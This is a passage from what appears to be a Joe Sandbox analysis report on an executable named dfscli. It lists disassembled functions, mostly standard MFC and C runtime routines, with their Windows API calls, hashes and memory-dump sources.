                                                                  • API ID: MessageRegisterWindow
                                                                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                  • API String ID: 1814269913-2889995556
                                                                  • Opcode ID: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction ID: fc5418e7bedd38ffc0e11e4f4bc2214e5acc9818e2d4631a821a168c411807f2
                                                                  • Opcode Fuzzy Hash: b09424a890d9c2d964cd6ab38d7185a386422683ead705cd42c27e26f868f6a1
                                                                  • Instruction Fuzzy Hash: 8E018C70A407845ACB30BFB69C09D4BBEE0EEC9B107615E6FE495A7660D6BCD001CF48
                                                                  Function 00427FF6 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  • GetVersion.KERNEL32 ref: 00428098
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004280BD
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004280E3
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 0042812F
                                                                  • ConvertDefaultLocale.KERNEL32(76230A60), ref: 00428135
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                  • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                  • API String ID: 780041395-483790700
                                                                  • Opcode ID: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction ID: 2dc31b13f6de58c0e78e48cd1bee0818dccec789095d0f28fd6a06ab5592f720
                                                                  • Opcode Fuzzy Hash: 978b5882cf4835e7424ef31a4d6838547d496389b0aa7b075c70622b72c37f28
                                                                  • Instruction Fuzzy Hash: A5514B71F40229AFDF109FE6DC85ABEBAB8EB48354F54043BF501E3290DA7C59419B68
                                                                  Function 00422E50 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00429CA6: __EH_prolog.LIBCMT ref: 00429CAB
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00422E85
                                                                  • GetClassLongA.USER32(?,000000E6), ref: 00422ECA
                                                                  • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00422EF6
                                                                  • lstrcmpiA.KERNEL32(?,ime), ref: 00422F05
                                                                  • SetWindowLongA.USER32(?,000000FC,Function_0002242E), ref: 00422F3F
                                                                  • CallNextHookEx.USER32(?,00000003,?,?), ref: 00423043
                                                                  • UnhookWindowsHookEx.USER32(?), ref: 00423054
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                  • API String ID: 3204395069-4034971020
                                                                  • Opcode ID: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction ID: a72a045e4e3713aab608079d00397e783e2f759094d70b61f3d5639fb80dd1df
                                                                  • Opcode Fuzzy Hash: 2e54a2d68c0ca1e145083fe81b64065eb11ebc909a731c844331e9d10c2e6431
                                                                  • Instruction Fuzzy Hash: 6951C331700124BBDF219F61ED48B9E7BB4AF18361F908166F814A62A1C778DE45DBAC
                                                                  Function 00404FF2 Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 78libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(USER32,?,?,?,00405143), ref: 0040501B
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00405037
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00405048
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00405059
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040506A
                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040507B
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040508C
                                                                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040509D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32$`#vp,$v
                                                                  • API String ID: 667068680-2614843311
                                                                  • Opcode ID: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction ID: a51757c319cfb8603869d02164866bf9d90346e9d9b4ab7557ddca89ad350173
                                                                  • Opcode Fuzzy Hash: 5547913a3e14e16a07a1123cd0d9303ef4187e5ce9ad497fcc0af7a3a5c74f0c
                                                                  • Instruction Fuzzy Hash: AD215E74A026179AE321AF27BDC452EBAF4F6487403E4543FD404E22D0D73954868F9E
                                                                  Function 00412421 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004124A2
                                                                  • _strcat.LIBCMT ref: 004124B5
                                                                  • _strlen.LIBCMT ref: 004124C2
                                                                  • _strlen.LIBCMT ref: 004124D1
                                                                  • _strncpy.LIBCMT ref: 004124E8
                                                                  • _strlen.LIBCMT ref: 004124F1
                                                                  • _strlen.LIBCMT ref: 004124FE
                                                                  • _strcat.LIBCMT ref: 0041251C
                                                                  • _strlen.LIBCMT ref: 00412564
                                                                  • GetStdHandle.KERNEL32(000000F4,00431F70,00000000,?,00000000,00000000,00000000,00000000), ref: 0041256F
                                                                  • WriteFile.KERNEL32(00000000), ref: 00412576
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                  • API String ID: 3601721357-4022980321
                                                                  • Opcode ID: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction ID: 13021548b91ef27835def0d839a72f5b902c9013898fcf24966e2a0fbd176725
                                                                  • Opcode Fuzzy Hash: 33eba8a56c94104930c01ea856345e6cd8f8d6e67629feebce46de6d582aadf8
                                                                  • Instruction Fuzzy Hash: 1B317B72640114ABDB24ABB9DCC1FEB3369EB44318F10082FF555E3192DE7CA4A5872C
                                                                  Function 00412E75 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 97COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,004321C0,00000118,0040EA00,00000001,00000000,00431A80,00000008,0041258D,00000000,00000000,00000000), ref: 00412EF6
                                                                  • _strcat.LIBCMT ref: 00412F0C
                                                                  • _strlen.LIBCMT ref: 00412F1C
                                                                  • _strlen.LIBCMT ref: 00412F2D
                                                                  • _strncpy.LIBCMT ref: 00412F47
                                                                  • _strlen.LIBCMT ref: 00412F50
                                                                  • _strcat.LIBCMT ref: 00412F6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$_strcat$FileModuleName_strncpy
                                                                  • String ID: ( C$...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                                                  • API String ID: 3058806289-1906809315
                                                                  • Opcode ID: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction ID: dc0b60b2e2fa07aa48be410cc1825f31972f92912820f319277543dbe6ba90b6
                                                                  • Opcode Fuzzy Hash: 54b1497dfd563ac8debf3ed2c16c48730149fe1c51b89dfeef04513612d6689f
                                                                  • Instruction Fuzzy Hash: 2931EC719012146BDB11AB61AD82ECE3668DF0A324F10046FF114F72D2DBBCDA954BAD
                                                                  Function 00411F5D Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 71libraryloadermemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,76230A60,00000000,0040E8F2,?,00431A70,00000060), ref: 00411F75
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00411F8D
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00411F9A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00411FA7
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00411FB4
                                                                  • FlsAlloc.KERNEL32(00411E16,?,00431A70,00000060), ref: 00411FF1
                                                                  • FlsSetValue.KERNEL32(00000000,?,00431A70,00000060), ref: 0041201E
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00412032
                                                                    • Part of subcall function 00411D88: FlsFree.KERNEL32(00000006,00412047,?,00431A70,00000060), ref: 00411D93
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$`#vp,$v$kernel32.dll
                                                                  • API String ID: 2355849793-3083462466
                                                                  • Opcode ID: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction ID: 94756841155c4855af9acbccb37cf424809e5c19bd57a04feacf727f30d0ec92
                                                                  • Opcode Fuzzy Hash: 87445edb743fa6b159021db6ff6499874027bb5d5b45ed15fee1da4cd6f863fa
                                                                  • Instruction Fuzzy Hash: 8E219270E01B109BD7209F36AC0AE567EE4EB94761710523BF400C22B0EB789887CF5C
                                                                  Function 0040D23B Relevance: 22.9, APIs: 15, Instructions: 359windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040D240
                                                                  • GetFocus.USER32 ref: 0040D269
                                                                  • GetParent.USER32(?), ref: 0040D2BE
                                                                  • GetParent.USER32(?), ref: 0040D2CE
                                                                  • GetKeyState.USER32(00000012), ref: 0040D386
                                                                  • IsDialogMessageA.USER32(?,?,?,?,?,00000000), ref: 0040D435
                                                                  • GetFocus.USER32 ref: 0040D447
                                                                  • GetFocus.USER32 ref: 0040D454
                                                                    • Part of subcall function 004043DD: GetNextDlgTabItem.USER32(?,?,?), ref: 004043F0
                                                                  • IsWindow.USER32(?), ref: 0040D46C
                                                                  • GetFocus.USER32 ref: 0040D478
                                                                  • IsWindow.USER32(?), ref: 0040D48E
                                                                  • GetFocus.USER32 ref: 0040D494
                                                                  • GetKeyState.USER32(00000010), ref: 0040D4C5
                                                                  • MessageBeep.USER32(00000000), ref: 0040D5BC
                                                                  • SendMessageA.USER32(?,000000F1,00000001,00000000), ref: 0040D6A3
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Focus$Message$ParentStateWindow$BeepDialogH_prologItemNextSend
                                                                  • String ID:
                                                                  • API String ID: 2999224188-0
                                                                  • Opcode ID: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction ID: 35367725a961e0762c2cabb331062711e07683ca912c259f6d9a903d8a3fc05f
                                                                  • Opcode Fuzzy Hash: 3f0161c52a8131cff4d874affb24284938a97bd9b6013c2c61ed968d9b0ac3a0
                                                                  • Instruction Fuzzy Hash: 07C19030E002159BDF20AFA5C885ABFBBB5AF54354F54443BE805B72D1C73DAC89CA5A
                                                                  Function 00416BA3 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(user32.dll,00431FC0,?,?), ref: 00416BBB
                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00416BD7
                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00416BE8
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00416BF5
                                                                  • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00416C0B
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00416C1C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                  • API String ID: 2238633743-1612076079
                                                                  • Opcode ID: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction ID: 84e52e513d7d4be0df6fc3aa4f30dfd75f48eeac0b79a234e46bab85f2138aa6
                                                                  • Opcode Fuzzy Hash: 9e327152f9d207da8eb992561a812df92acea30e061754a633c313ec85e84a5e
                                                                  • Instruction Fuzzy Hash: CA21A7B1A00306ABDB249F659E85FBB3BECDB48740B15103AE945C2250F778D984D7AD
                                                                  Function 0042B969 Relevance: 19.9, APIs: 13, Instructions: 395stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0042B96E
                                                                  • lstrlenA.KERNEL32(?,?,?), ref: 0042B9A8
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC3B
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BC62
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCC6
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCDB
                                                                  • SysFreeString.OLEAUT32(?), ref: 0042BCF0
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0042BD28
                                                                  • VariantClear.OLEAUT32(?), ref: 0042BD38
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
                                                                  • String ID:
                                                                  • API String ID: 344392101-0
                                                                  • Opcode ID: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction ID: 7c280d155deaacb0d062ce9fde7c5bc633f2178c496f6d30549a061dd8c1b599
                                                                  • Opcode Fuzzy Hash: 089186b2475cb69903ae3bdd73d4d94893396a00b302e6d1bc5308c4256f1ad2
                                                                  • Instruction Fuzzy Hash: 59E1AE71A00219DFDF10DFA9E880AEEBBB5FF05300F54442AE951A7250D738AD52CFA9
                                                                  Function 0042166B Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00423CEB: GetWindowLongA.USER32(?,000000F0), ref: 00423CF6
                                                                  • GetParent.USER32(?), ref: 00421696
                                                                  • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004216B9
                                                                  • GetWindowRect.USER32(?,?), ref: 004216D2
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004216E5
                                                                  • CopyRect.USER32(?,?), ref: 00421732
                                                                  • CopyRect.USER32(?,?), ref: 0042173C
                                                                  • GetWindowRect.USER32(00000000,?), ref: 00421745
                                                                  • CopyRect.USER32(?,?), ref: 00421761
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                  • String ID:
                                                                  • API String ID: 808654186-0
                                                                  • Opcode ID: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction ID: ef626137246b3df9443168ea5854a1867bc10e0d27b41f31f247ff74b2751243
                                                                  • Opcode Fuzzy Hash: 543d3be195253b833f47fdbe98b0e5ceab59b1d8d68aa360d95ee6028cc7d4e0
                                                                  • Instruction Fuzzy Hash: CB518471B00219AFDB10DBA9DD85FEEBBB9AF94314F590126F501F3290D638E9068B58
                                                                  Function 0040E812 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 134COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersionExA.KERNEL32(?,00431A70,00000060), ref: 0040E832
                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00431A70,00000060), ref: 0040E885
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8E7
                                                                  • _fast_error_exit.LIBCMT ref: 0040E8F8
                                                                  • GetCommandLineA.KERNEL32(?,00431A70,00000060), ref: 0040E917
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 0040E96B
                                                                  • __wincmdln.LIBCMT ref: 0040E971
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040E98E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
                                                                  • String ID: P5`$`#vp,$v
                                                                  • API String ID: 3897392166-2176719703
                                                                  • Opcode ID: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction ID: 0bc8d0c747b5be90a239dc1f6fd12c79bdb3a1e517c7b53da2822559ab0157a6
                                                                  • Opcode Fuzzy Hash: e1bf0c6c10a35e2feaa378b61d2a2dbd1c9d61abde69f1a15ddcab38a1182d4c
                                                                  • Instruction Fuzzy Hash: E241B0B1D002109ADB20BF739D456AE77B0AF44718F24883FE415FB2D2DA7C88928B5D
                                                                  Function 00415212 Relevance: 16.8, APIs: 11, Instructions: 299COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004322C4,00000001,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00415239
                                                                  • GetLastError.KERNEL32 ref: 0041524B
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0040FE1B,?,00000000,00000000,004322C8,00000038,0040FB6E,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004152D2
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0040FE1B,?,?,00000000), ref: 00415353
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041536D
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004153A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction ID: 5d6a1a971d9631bc273ea7c0213d5fa4ae4f756ba9487c2342617ad8996632df
                                                                  • Opcode Fuzzy Hash: 144a4794a36e381682c1608e6ad5055cd70a4332a4d33170656413dfc46b285a
                                                                  • Instruction Fuzzy Hash: 26B1AD72800509EFCF119FA1DC859EE7BB6FF48318F14452AF911A22A0D33989A1DF69
                                                                  Function 0042056E Relevance: 16.6, APIs: 11, Instructions: 120COMMON
                                                                  Download Yara Rule
